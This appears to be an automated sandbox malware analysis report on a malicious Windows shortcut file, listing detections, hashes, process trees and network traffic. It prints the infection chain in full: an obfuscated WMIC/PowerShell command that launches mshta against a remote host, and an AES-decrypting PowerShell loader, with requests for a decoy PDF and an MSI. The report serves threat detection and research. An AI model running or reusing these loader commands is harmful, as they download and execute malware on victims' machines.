
Windows Analysis Report
GYede3Gwn0.lnk

Overview

General Information

Sample name: GYede3Gwn0.lnk (renamed because the original name is a hash value)
Original sample name: 560d5d5e43b6d2ac1bdfb3ca4156e6d7.lnk
Analysis ID: 1582715
MD5: 560d5d5e43b6d2ac1bdfb3ca4156e6d7
SHA1: 51ac4281c6bab97eed94a529d901cd29cc15f36d
SHA256: 98a28a0d4d028d446811b620e519d258feb8dc4c494705f372ae0c7c22fa9804
Tags: lnk, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • WMIC.exe (PID: 592 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3560 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 4372 cmdline: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 6892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 2012 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 7248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7436 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,4098495586832086612,16880335015844126518,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]
Rule: emmenhtal_strings_hta_exe
Description: Emmenhtal Loader string
Author: Sekoia.io
Strings:
  • 0x3f1df:$char: = String.fromCharCode(ac,yU,
  • 0x3f1d8:$var: var
  • 0x5bcae:$eval: eval(
  • 0x3f04f:$script1: <script>
  • 0x5bca4:$script1: <script>
  • 0x46c9b:$script2: </script>MZ
  • 0x5bcca:$script2: </script>MZ

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc, CommandLine: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc, ProcessId: 4372, ProcessName: mshta.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799
429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", ProcessId: 592, ProcessName: WMIC.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 592, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc'), ProcessId: 3560, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3544, ProcessName: svchost.exe
Timestamp: 2024-12-31T10:38:08.665503+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; Source IP: 192.168.2.6; Source Port: 49743; Destination IP: 92.113.18.193; Destination Port: 443; Protocol: TCP


AV Detection

Source: https://vividpulse.pro/Seed/Havoc; Avira URL Cloud: Label: malware
Source: https://vividpulse.pro/Seed/Havoc...; Avira URL Cloud: Label: malware
Source: GYede3Gwn0.lnk; ReversingLabs: Detection: 18%
Source: GYede3Gwn0.lnk; Virustotal: Detection: 25%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
Source: unknown; HTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 92.113.18.193:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506065317.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487288240.0000025067FDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488031202.0000025067FB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2492202557.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486345717.000002506C091000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr
Source: global traffic; HTTP traffic detected: GET /Fox/API%20_Guide.pdf HTTP/1.1; Host: vividpulse.pro; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Quantum/XZJKPUBX.msi HTTP/1.1; Host: vividpulse.pro
Source: Joe Sandbox View; ASN Name: UKRTELNETUA UKRTELNETUA
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49743 -> 92.113.18.193:443
Source: global traffic; HTTP traffic detected: GET /Seed/Havoc HTTP/1.1; Accept: */*; Accept-Language: en-CH; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: vividpulse.pro; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /Seed/Havoc HTTP/1.1; Accept: */*; Accept-Language: en-CH; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: vividpulse.pro; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Fox/API%20_Guide.pdf HTTP/1.1; Host: vividpulse.pro; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Quantum/XZJKPUBX.msi HTTP/1.1; Host: vividpulse.pro
Source: global traffic; DNS traffic detected: DNS query: vividpulse.pro
Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
Source: mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506242592.00000248653CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508548791.00000248653CB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.v
Source: svchost.exe, 00000008.00000002.3418085675.000001549CA85000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.12.dr; String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.2176748936.0000024DD929D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: edb.log.8.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000008.00000003.2197751329.000001549C900000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2180956426.0000024DF141A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.micros
Source: mshta.exe, 00000006.00000002.2508410347.000002486536B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.0000024865368000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.p
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pr
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro
Source: mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/
Source: mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/?P
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Fox/API
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Fox/API%20_Guide.pdf
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Q
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Qu
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Qua
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quan
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quant
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantu
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/X
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZ
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJ
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJK
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKP
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPU
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUB
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.
Source: powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://vividpulse.pro/Quantum/XZJKPUBX.m
